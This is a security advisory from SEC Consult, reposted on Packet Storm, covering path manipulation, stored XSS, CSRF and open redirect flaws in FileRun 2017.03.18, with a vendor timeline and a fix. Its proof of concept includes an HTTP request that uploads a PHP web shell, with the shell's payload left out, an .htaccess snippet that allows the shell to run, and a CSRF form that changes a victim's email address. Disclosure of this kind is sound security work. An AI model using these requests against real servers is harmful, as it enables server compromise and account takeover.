Exploit the possiblities

Afian AB FileRun 2017.03.18 CSRF / Shell Upload / XSS / Redirection

Afian AB FileRun 2017.03.18 CSRF / Shell Upload / XSS / Redirection
Posted Oct 17, 2017
Authored by Roman Ferdigg | Site sec-consult.com

Afian AB FileRun version 2017.03.18 suffers from cross site request forgery, cross site scripting, open redirection, remote shell upload, and various other vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, csrf
MD5 | 3ff1edbfd9d2d8fe8f706e14236d4010

Afian AB FileRun 2017.03.18 CSRF / Shell Upload / XSS / Redirection

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
title: Multiple vulnerabilities
product: Afian AB FileRun
vulnerable version: 2017.03.18
fixed version: 2017.09.18
impact: critical
homepage: https://www.filerun.com | https://afian.se
found: 2017-08-28
by: Roman Ferdigg (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich



Vendor description:
"FileRun File Manager: access your files anywhere through self-hosted
secure cloud storage, file backup and sharing for your photos, videos,
files and more. Upload and download large files for easy sharing. Google
Drive self-hosted alternative."

Source: https://www.filerun.com

Business recommendation:
By exploiting the vulnerabilities documented in this advisory, an attacker
can compromise the web server which has FileRun installed. User files might
get exposed through this attack.

SEC Consult recommends not to use FileRun until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.

Vulnerability overview/description:
1) Path Manipulation
When uploading, downloading or viewing files, FileRun uses a parameter to
specify the path on the file-system. An attacker can manipulate the value
of this parameter to read, create and even overwrite files in certain
folders. An attacker could upload malicious files to compromise the
webserver. In combination with the open redirect and CSRF vulnerability
even an unauthenticated attacker can upload these files to get a shell.
Through the shell all user files can be accessed.

2) Stored Cross Site Scripting (XSS) via File Upload
The application allows users to upload different file types. It is also
possible to upload HTML files or to create them via the application's text
editor. Files can be shared using a link or within the FileRun application
(in the enterprise version). An attacker can inject JavaScript in HTML
files to attack other users or simply create a phishing site to steal user

In the standard configuration of the FileRun docker image the HttpOnly
cookie flag is not set, which means that authentication cookies can be
accessed in an XSS attack. This allows easy session hijacking as well.

3) Cross Site Request Forgery (CSRF)
The application does not implement CSRF protection. An attacker can exploit
this vulnerability to execute arbitrary requests with the privileges of the
victim. The only requirement is that a victim visits a malicious webpage.
Such a page could be hosted on the FileRun server itself and shared with
other users as described in vulnerability 2.
Besides others, the following actions can be performed via CSRF if the
victim has administrative privileges:
- Create or delete users
- Change permissions rights of users
- Change user passwords

If the victim has no administrative privileges, for example the following
actions can be performed:
- Upload files
- Change the email address (for password recovery)

4) Open Redirect Vulnerabilities
An open redirect vulnerability in the login and logout pages allows an
attacker to redirect users to arbitrary web sites. The redirection host
could be used for phishing attacks (e.g. to steal user credentials) or for
running browser exploits to infect a victim's machine with malware. The open
redirect in the login page could also be used to exploit CSRF (see above).
Because the server name in the manipulated link is identical to the
original site, phishing attempts may have a more trustworthy appearance.

Proof of concept:
1) Path Manipulation
The URL below is used to read the application file "autoconfig.php", which
contains the username and cleartext password of the database.


This post request is used to upload a PHP shell in the writable folder

POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------293712729522107
Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
DNT: 1
Connection: close

Content-Disposition: form-data; name="flowTotalSize"

Content-Disposition: form-data; name="flowIsFirstChunk"

Content-Disposition: form-data; name="flowIsLastChunk"

Content-Disposition: form-data; name="flowFilename"

Content-Disposition: form-data; name="path"

Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

*web shell payload here*


To execute the uploaded shell a .htaccess file with the contents below can
be uploaded in the same folder.

Content of .htaccess file:
<Files "*">
Order allow,deny
Allow from all

The uploaded shell can be accessed by the following URL:

2) Stored Cross Site Scripting (XSS) via File Upload
An HTML file with JavaScript code can be easily uploaded to attack other users.
No PoC necessary.

3) Cross Site Request Forgery
An example for a CSRF attack would be the following request which changes
the email address of the victim:

<form action="http://$DOMAIN/?module=fileman&section=profile&action=save"
<input type="hidden" name="receive_notifications" value="0" />
<input type="hidden" name="two_step_enabled" value="0" />
<input type="hidden" name="name" value="User" />
<input type="hidden" name="name2" value="A" />
<input type="hidden" name="email" value="newemail@example.com" />
<input type="hidden" name="ext-comp-1009" value="on" />
<input type="hidden" name="current_password" value="" />
<input type="hidden" name="new_password" value="" />
<input type="hidden" name="confirm_new_password" value="" />
<input type="submit" value="Submit request" />

The new email address can be used by the attacker to reset the password of
the victim.

4) Open Redirect Vulnerabilites
The URL below can be used to forward a user to an arbitrary website after
the login:

The value of the redirect parameter needs to be base64 encoded.

To redirect a user after logout, following URL can be used:

In this case for a successful exploit, the victim has to be logged in.

Vulnerable / tested versions:
The regular version of FileRun 2017.03.18 has been tested. It is assumed
earlier versions of FileRun are also vulnerable to the issues.

Vendor contact timeline:
2017-08-31: Contacting vendor through info@afian.se, info@filerun.com
2017-09-01: Sending unencrypted advisory as requested by vendor
2017-09-04: FileRun fixed the vulnerability "Path Manipulation"
2017-09-12: Requesting a status update
2017-09-13: FileRun informed us that a patch for all vulnerabilities will
be released before 2017-09-20
2017-09-16: Patch available
2017-10-18: Public release of security advisory

Update to the latest version available (see https://docs.filerun.com/updating).
According to FileRun, all the vulnerabilities are fixed in release
2017.09.18 or higher.

For further information see:

No workaround available.

Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Roman Ferdigg / @2017


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    15 Files
  • 22
    Nov 22nd
    23 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2016 Packet Storm. All rights reserved.

Security Services
Hosting By